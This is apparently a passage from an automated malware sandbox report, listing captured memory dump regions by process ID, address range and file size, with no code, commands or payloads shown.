                                                                                                                                                                                                        • memory/3028-666-0x00000000013E5000-0x00000000013E6000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/3028-647-0x00000000013E6000-0x00000000013E7000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/3028-639-0x00000000013E4000-0x00000000013E5000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/3028-608-0x00000000013E0000-0x00000000013E2000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          8KB

                                                                                                                                                                                                        • memory/3036-212-0x0000000002E58000-0x0000000002E7B000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          140KB

                                                                                                                                                                                                        • memory/3036-160-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3036-673-0x0000000004AD0000-0x0000000004AE3000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          76KB

                                                                                                                                                                                                        • memory/3036-316-0x0000000004A90000-0x0000000004AC0000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          192KB

                                                                                                                                                                                                        • memory/3132-164-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3152-283-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3208-460-0x0000000002D50000-0x0000000002D66000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          88KB

                                                                                                                                                                                                        • memory/3208-661-0x0000000004660000-0x0000000004676000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          88KB

                                                                                                                                                                                                        • memory/3256-284-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3256-209-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3488-429-0x0000000004BD0000-0x0000000004BD9000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          36KB

                                                                                                                                                                                                        • memory/3488-192-0x000000000324C000-0x0000000003255000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          36KB

                                                                                                                                                                                                        • memory/3488-179-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3500-588-0x0000000005D80000-0x0000000005D81000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/3516-297-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3564-553-0x0000000005C10000-0x0000000005C11000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/3708-305-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3736-223-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3736-232-0x00000000029E0000-0x00000000029F0000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          64KB

                                                                                                                                                                                                        • memory/3736-236-0x0000000002A00000-0x0000000002A12000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          72KB

                                                                                                                                                                                                        • memory/3848-300-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3848-565-0x0000000005B90000-0x0000000005B91000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/3900-149-0x0000000005A20000-0x0000000005B65000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.3MB

                                                                                                                                                                                                        • memory/3992-294-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4116-249-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4212-148-0x000001B4034F0000-0x000001B4034F4000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          16KB

                                                                                                                                                                                                        • memory/4212-146-0x000001B400E70000-0x000001B400E80000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          64KB

                                                                                                                                                                                                        • memory/4212-147-0x000001B400EF0000-0x000001B400F00000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          64KB

                                                                                                                                                                                                        • memory/4292-323-0x0000000005650000-0x0000000005651000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/4292-321-0x0000000002E90000-0x0000000002E91000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/4292-317-0x0000000000D00000-0x0000000000D01000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/4292-307-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4308-295-0x0000000005C70000-0x0000000005DB5000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.3MB

                                                                                                                                                                                                        • memory/4308-279-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4540-247-0x000000001AF80000-0x000000001AF82000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          8KB

                                                                                                                                                                                                        • memory/4540-217-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4540-228-0x0000000000190000-0x0000000000191000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/4668-679-0x0000000000960000-0x0000000000969000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          36KB

                                                                                                                                                                                                        • memory/4672-437-0x0000000005840000-0x0000000005841000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/4672-325-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4752-262-0x0000000006100000-0x0000000006101000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/4752-256-0x0000000005E30000-0x0000000005E31000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/4752-253-0x0000000005900000-0x0000000005901000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/4752-254-0x0000000005930000-0x0000000005931000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/4752-169-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4752-252-0x0000000006450000-0x0000000006451000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/4752-244-0x00000000006C0000-0x00000000006C1000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/4752-269-0x0000000005FA0000-0x0000000005FA1000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/4752-259-0x0000000005990000-0x0000000005991000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/4752-255-0x0000000005A60000-0x0000000005A61000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/4796-229-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4848-327-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4980-207-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4992-533-0x000002DA1F5E2000-0x000002DA1F5E4000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          8KB

                                                                                                                                                                                                        • memory/4992-551-0x000002DA1F5E4000-0x000002DA1F5E5000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/4992-473-0x000002DA1F5E0000-0x000002DA1F5E2000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          8KB

                                                                                                                                                                                                        • memory/4992-315-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4992-319-0x000002DA04B90000-0x000002DA04B91000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/5008-464-0x0000000002270000-0x0000000002271000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/5008-445-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/5132-417-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/5144-337-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/5204-433-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/5204-439-0x0000000000400000-0x0000000000409000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          36KB

                                                                                                                                                                                                        • memory/5228-344-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/5328-516-0x0000000004C20000-0x0000000004C69000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          292KB

                                                                                                                                                                                                        • memory/5328-346-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/5332-658-0x0000000005BA0000-0x0000000005BA1000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/5352-348-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/5352-405-0x0000000005520000-0x0000000005521000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/5376-357-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/5444-352-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/5476-423-0x0000027ED1770000-0x0000027ED18D1000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.4MB

                                                                                                                                                                                                        • memory/5476-420-0x0000027ED1910000-0x0000027ED1A6B000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.4MB

                                                                                                                                                                                                        • memory/5476-355-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/5572-542-0x000001CBB2AB0000-0x000001CBB2AB2000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          8KB

                                                                                                                                                                                                        • memory/5572-670-0x000001CBB2AB8000-0x000001CBB2ABA000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          8KB

                                                                                                                                                                                                        • memory/5572-546-0x000001CBB2AB3000-0x000001CBB2AB5000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          8KB

                                                                                                                                                                                                        • memory/5572-600-0x000001CBB2AB6000-0x000001CBB2AB8000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          8KB

                                                                                                                                                                                                        • memory/5672-363-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/5700-364-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/5700-375-0x0000000000400000-0x000000000046D000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          436KB

                                                                                                                                                                                                        • memory/5708-434-0x0000000000C80000-0x0000000000C82000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          8KB

                                                                                                                                                                                                        • memory/5708-425-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/5712-513-0x0000000002FE0000-0x0000000002FE9000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          36KB

                                                                                                                                                                                                        • memory/5712-365-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/5764-489-0x0000000004DF0000-0x0000000004DF1000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/5768-370-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/5800-372-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/5924-388-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/5976-579-0x0000000005530000-0x0000000005531000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/6020-623-0x00000000015D2000-0x00000000015D4000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          8KB

                                                                                                                                                                                                        • memory/6020-631-0x00000000015D4000-0x00000000015D5000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/6020-636-0x00000000015D5000-0x00000000015D6000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/6020-602-0x00000000015D0000-0x00000000015D2000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          8KB

                                                                                                                                                                                                        • memory/6020-458-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/6028-386-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/6028-402-0x00000000007A0000-0x00000000007A1000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/6080-389-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/6080-408-0x0000000005020000-0x0000000005021000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/7492-686-0x0000000002EF0000-0x0000000002F64000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          464KB